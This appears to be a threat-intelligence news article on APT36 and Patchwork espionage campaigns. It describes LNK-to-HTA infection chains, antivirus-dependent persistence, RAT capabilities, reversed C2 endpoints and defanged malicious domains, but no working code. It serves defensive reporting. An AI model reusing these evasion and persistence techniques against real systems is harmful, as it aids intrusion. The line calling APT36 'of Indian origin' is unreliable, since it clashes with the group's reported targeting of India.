The advanced persistent threat group known as Transparent Tribe has been linked to a new wave of cyber espionage operations targeting Indian government bodies, academic organizations, and strategically significant institutions. The attacks rely on a remote access trojan (RAT) designed to provide long-term, stealthy control over compromised systems.
According to a technical assessment published by CYFIRMA, the campaign uses highly deceptive delivery mechanisms, including a malicious Windows shortcut (LNK) file disguised as a legitimate PDF document. To reduce suspicion, the threat actor embeds authentic PDF content within the malicious file, making it appear genuine to victims.
Transparent Tribe — also tracked as APT36 — is a well-known cyber espionage group that has consistently targeted Indian entities for intelligence gathering. Believed to be state-sponsored and of Indian origin, the group has maintained operational activity since at least 2013.
Expanding Arsenal of Remote Access Trojans
Over the years, Transparent Tribe has continuously refined its malware ecosystem. The group has deployed multiple RAT families, including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT, each tailored to meet evolving operational needs.
In the most recent attacks, victims receive spear-phishing emails containing a ZIP archive. Inside the archive is a shortcut file that masquerades as a PDF document. When opened, the LNK file launches a remote HTML Application (HTA) using mshta.exe. This HTA script decrypts and executes the final RAT payload entirely in memory, helping the malware evade detection.
Simultaneously, the HTA downloads and opens a decoy PDF document, creating the illusion that a harmless file was accessed.
CYFIRMA Said that the HTA script relies heavily on ActiveX components, particularly WScript.Shell, to interact with the Windows operating system. This allows the malware to profile the environment, manipulate runtime behaviour, and improve execution reliability — techniques frequently associated with malicious abuse of mshta.exe.
Adaptive Persistence Based on Antivirus Detection
One of the most notable features of this campaign is the malware’s ability to adjust its persistence strategy based on the antivirus software installed on the infected system.
- Kaspersky detected:
- The malware creates a working directory at C:\Users\Public\core\, stores an obfuscated HTA payload, and establishes persistence by placing a malicious LNK file in the Windows Startup folder that launches the HTA via mshta.exe.
- Quick Heal detected:
- Persistence is achieved using a batch script and a malicious LNK file placed in the Startup folder. The HTA payload is written to disk and executed through the batch file.
- Avast, AVG, or Avira detected:
- The payload is directly copied into the Startup directory and executed from there.
- No recognized antivirus found:
- The malware falls back on a layered approach that combines batch-file execution, registry-based persistence, and payload deployment before triggering execution.
A secondary HTA component drops a DLL named iinneldc.dll, which acts as a fully-featured RAT. The malware supports remote command execution, file management, data exfiltration, screenshot capture, clipboard monitoring, and process manipulation, granting attackers deep control over infected systems.
CYFIRMA emphasised that APT36 remains a highly persistent, intelligence-driven threat, maintaining a long-term focus on Indian government agencies, educational institutions, and other strategically sensitive sectors.
Related Campaign Using Government Advisory Lures
In parallel activity observed in recent weeks, APT36 has also been connected to another operation that uses a malicious shortcut file disguised as a government advisory PDF named “NCERT-Whatsapp-Advisory.pdf.lnk”.
This shortcut executes an obfuscated command via cmd.exe, downloading an MSI installer (nikmights.msi) from a remote server hosted at aeroclubofindia[.]co[.]in. The installer performs several actions:
- Displays a legitimate decoy PDF to the victim
- Decodes and drops DLL files at C:\ProgramData\PcDirvs\pdf.dll and wininet.dll
- Deploys and executes PcDirvs.exe after a 10-second delay
- Establishes persistence using a malicious HTA script that modifies the Windows Registry to launch the payload on every system startup
The decoy document displayed to victims is a genuine 2024 advisory issued by Pakistan’s National Cyber Emergency Response Team (PKCERT), warning about a fraudulent WhatsApp campaign a tactic designed to enhance credibility and reduce suspicion.
The dropped wininet.dll communicates with a hard-coded command-and-control (C2) server hosted at dns.wmiprovider[.]com, which was registered in April 2025. Although the C2 infrastructure is currently inactive, registry-based persistence ensures the malware can be reactivated at any time.
The DLL implements multiple HTTP GET-based endpoints to communicate with the C2 server. To evade static detection, endpoint strings are stored in reverse order. Observed endpoints include:
- /retsiger – Registers the infected system
- /taebtraeh – Sends heartbeat beacons
- /dnammoc_teg – Executes attacker-issued commands via cmd.exe
- /dnammocmvitna – Handles anti-virtual machine behaviour
The malware also queries installed antivirus products, further enhancing its reconnaissance capabilities.
Patchwork APT Linked to New StreamSpy Malware
The disclosure coincides with separate findings linking Patchwork also known as Dropping Elephant or Maha Grass — to recent cyber operations targeting Pakistan’s defence sector.
Security researcher Idan Tarab revealed that the group has been deploying a Python-based backdoor delivered through phishing emails containing ZIP archives. These archives include a malicious MSBuild project that runs via msbuild.exe and eventually installs the Python RAT.
The backdoor allows attackers to communicate with a C2 server, execute Python modules, run system commands, and upload or download files.
Tarab described the campaign as a highly modernised, heavily obfuscated toolkit that combines MSBuild loaders, modified PyInstaller runtimes, marshalled bytecode implants, geofencing logic, randomised PHP C2 endpoints, and realistic persistence techniques.
As of December 2025, Patchwork has also been associated with a previously undocumented Trojan named StreamSpy. The malware uses WebSocket channels for command execution and response delivery, while HTTP is used for file transfers, helping it evade traditional traffic monitoring.
According to QiAnXin, StreamSpy shares technical similarities with Spyder, a backdoor variant related to WarHawk, which has been attributed to SideWinder—Patchwork’s use of Spyder-based tooling dates back to 2023.
StreamSpy Distribution and Capabilities
StreamSpy is distributed via ZIP files such as “OPS-VII-SIR.zip” hosted on firebasescloudemail[.]com. The contained executable (Annexure.exe) supports:
- System and disk enumeration
- Persistence via registry keys, scheduled tasks, or Startup folder LNK files
- C2 communication over HTTP and WebSocket
Supported commands include file download and execution, shell switching between cmd and PowerShell, file upload and deletion, directory enumeration, and encrypted payload delivery.
QiAnXin also noted that the same download infrastructure hosts Spyder variants with extensive data collection capabilities. Additionally, the malware’s digital signature overlaps with that of ShadowAgent, a RAT attributed to the DoNot Team (Brainworm). The 360 Threat Intelligence Centre previously flagged Annexure.exe as ShadowAgent in November 2025.
The findings suggest resource sharing and operational overlap between the Maha Grass and DoNot groups.
Final Assessment
Security researchers conclude that the emergence of StreamSpy, along with the continued development of RAT variants, demonstrates that both Transparent Tribe (APT36) and Patchwork (Maha Grass) remain active, adaptive, and strategically motivated threat actors.
By leveraging advanced evasion techniques, LOLBins, multi-stage loaders, and diversified persistence mechanisms, these groups continue to pose a serious threat to regional security and critical institutions.
